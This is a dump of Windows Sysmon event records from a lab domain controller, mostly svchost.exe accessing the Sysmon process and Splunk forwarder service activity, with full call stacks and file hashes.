12:01:01.916{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001859Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001858Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001857Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001856Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001855Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001854Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001853Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001852Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001851Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001850Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.707{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001849Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.707{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001848Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.707{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001847Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.707{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001846Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.707{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001845Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.707{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001844Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.707{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001843Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.707{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001842Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.707{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001841Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.690{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001840Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.690{266CAFBE-646A-6064-0A00-00000000AE01}8401248C:\Windows\system32\services.exe{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+3332|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001839Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.041{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" serviceC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001838Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.690{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001837Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.690{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001836Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.690{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001835Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 